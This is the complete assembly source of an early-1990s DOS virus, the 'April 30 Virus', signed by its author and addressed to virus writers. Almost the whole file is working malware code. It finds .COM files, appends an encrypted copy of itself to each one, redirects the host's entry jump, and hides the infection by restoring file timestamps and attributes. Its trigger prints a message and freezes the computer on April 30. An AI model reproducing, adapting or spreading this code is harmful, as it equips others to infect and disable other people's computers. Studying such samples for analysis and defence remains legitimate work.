;******************************************************************************
;* Written in *
;* April 30 Virus - Strain A A86 V3.22 *
;* ---------- *
;******************************************************************************
;* "NightBird goes, *
;* Along with the Queen..." *
;******************************************************************************
; You are now looking at the result of my very first attempt to code
; a Virus. This virus is a non-Resident Self-encrypting Direct Action
; Com Infector, which doesn't infect Command.com. The Virus is only active
; on April 30, showing the Message and Hanging the System.....
; You can recognize an infected File simply, the 4th Byte is a 'N'ightBird.
;
; Disclaimer: The Author will not be held responsible for any actions
; caused by this Virus.
;
; Note: Don't just say: " another boring virus.. ", instead
; be a teaching aid, and search for my pitfalls, (ofcoz
; if there are any!), so I can improve my code....
; Please do so.....
;
; Enough of that crap talk,
; Greetingz go to... : John Tardy / TridenT and all other Members..
; : Serge of (Ex) House Designs
; : All Virus-Writers around the globe
;
; Well that's it for now.....
;
; C U & Have pHun,
; (c) NightBird Dec. 1992.
org 100h ; Produce a Com File
Start: jmp Prog ;
db 'N' ; Virus ID
Prog: Push ax ; Save Possible Errors
call Main ; Get Virus
Main: pop bp ; Offset
sub bp,offset Main ; IP = BP
lea si,Restore[bp] ;
mov di,si ;
mov cx,CrypterLen ; Decrypt
Decrypt: lodsb ; the
Key: Add al,0 ; Virus
stosb ;
loop Decrypt ;
Decryptlen equ $-Prog ;
Restore: lea si,[bp+Restore_Host] ; Restore
mov di,100h ; the Original
movsw ; 4 Bytes of the
movsw ; Host Program
mov ah,2ah ; Is it
int 21h ; the 30 of
cmp dh,4 ; April?
jne Start_Virus ; Yes, Show Txt
cmp dl,30 ; No, Continue
jne Start_Virus ; with Start_Virus
mov ah,09h ;
lea dx,Txt[bp] ; Show Txt
int 21h ; And lock
HyperSpace: cli ; the Computer
jmp HyperSpace ;
Start_Virus: mov ax,3524h ; Get Adress of
int 21h ; Interrupt 24h
lea Oldint24h[bp],es ; Store
lea Oldint24h+2[bp],bx ; them...
push cs ; Cs = Es
pop es ; Register
mov ax,2524h ; Install a new
lea dx,Newint24h ; Int. to suppres
int 21h ; Errors..
mov ah,1ah ; Move DTA
mov dx,dta ; to a save
int 21h ; place
mov ah,4eh ;
Search: lea dx,[bp+Filespec] ; Search
xor cx,cx ; for a com file, and
int 21h ; and quit if error
jnc Found ;
jmp End_Virus ;
Found: cmp word ptr [bp+offset dta+35],'DN' ; Check If Command.com
je Find_Next_one ;
mov ax,4300h ; Fetch file
mov dx,dta+1eh ; Attribute
int 21h ; and store it
push cx ; on stack
mov ax,4301h ; Set attribute
mov cx,cx ; for use
int 21h ;
mov ax,3d02h ; Open file
int 21h ; Dx = 0fd1eh
xchg ax,bx ; BX = FileHandle
mov ax,5700h ; Get file/date
int 21h ; format and
push cx ; store them
push dx ; on stack
mov ah,3fh ; Read 4 Bytes
lea dx,[bp+Restore_Host] ; and save
mov cx,4 ; them..
int 21h
mov ax,[Restore_Host+bp] ; Check
cmp ax,'MZ' ; if it is
je Exit ; a renamed
cmp ax,'ZM' ; Exe-File
je exit ;
mov ah,[bp+Restore_Host+3] ; Check if Already
cmp ah,'N' ; infected
jne Infect
; Jump to Sub-Routine
Exit: Call Close
Find_Next_one: mov ah,4fh ; Try Another
jmp Search ; file...
Infect: mov ax,4202h ; Move File
xor cx,cx ; Pointer to
xor dx,dx ; the End of
int 21h ; the File
cmp ax,0fb00h ; File too
jae Exit ; Big
cmp ax,Minlen ; File too
jbe Exit ; Short
sub ax,3 ; Save Jmp
mov word ptr [bp+Jmp_to_Virus]+1,ax ;
Zero: mov ah,2ch ; (If the key
int 21h ; is 0,go Zero)
cmp dl,0 ;
jne Continue ; Get Seconds
jmp Zero ; to save as
Continue: mov key+1[bp],dl ; Decrypter-Key
lea si,[Prog+bp] ;
mov di,0fd00h ; Move the
mov cx,Decryptlen ; Decrypter
rep movsb ; Part
lea si,Restore[bp] ;
mov cx,Crypterlen ; Decrypt behind
Encrypt: lodsb ; the
Sub al,dl ; Decrypter
stosb ;
loop encrypt ;
mov ah,40h ; Write Virus
lea dx,0fd00h ; at the end
mov cx,virlen ; of the file!
int 21h ;
mov ax,4200h ; Move File
xor cx,cx ; Pointer to
xor dx,dx ; the start of
int 21h ; the file
mov ah,40h ; Write Virus-Jmp
lea dx,Jmp_to_Virus[bp] ; to the begin
mov cx,4 ; of the file
int 21h ;
call close ; Jump to Sub-Routine
End_Virus: mov ax,2524h ;
lea bx,Oldint24h[bp] ; Restore Old
mov ds,bx ; (Critical Error)
lea dx,Oldint24h+2[bp] ; Interrupt 24h
int 21h ;
push cs ; Cs = Ds
pop ds ; Register
mov ah,1ah ;
mov dx,80h ;
int 21h ; Restore DTA
pop ax ; and go back
mov di,100h ; to the Host
push di ; Program
ret ;
Close: pop si ; Fetch IP from Stack
pop dx ;
pop cx ; Restore
mov ax,5701h ; Date/Time
int 21h ;
mov ah,3eh ; Close
int 21h ; File
mov ax,4301h ;
pop cx ; Restore File
mov dx,dta+1eh ; Attributes
int 21h ;
push si ; Restores IP
ret ;
Newint24h: mov al,3 ; Suppres Errors
iret ; & Go back
Oldint24h dd 0
Restore_Host db 0cdh,20h,0,0
Jmp_to_Virus db 0e9h,0,0,'N'
Filespec db '*.com',0
Txt db 13,10,9,9,'"NightBird goes,',10,'Along with the Queen..."',13,10,7,'$'
Names db '*April 30 Virus*'
Dta equ 0fc00h
Crypterlen equ $-Restore
Virlen equ $-Prog
Minlen equ Virlen*2
; ------------------------------------------------------------------------
; ---------------> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <---------------
; -----------> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <-----------
; ------------------------------------------------------------------------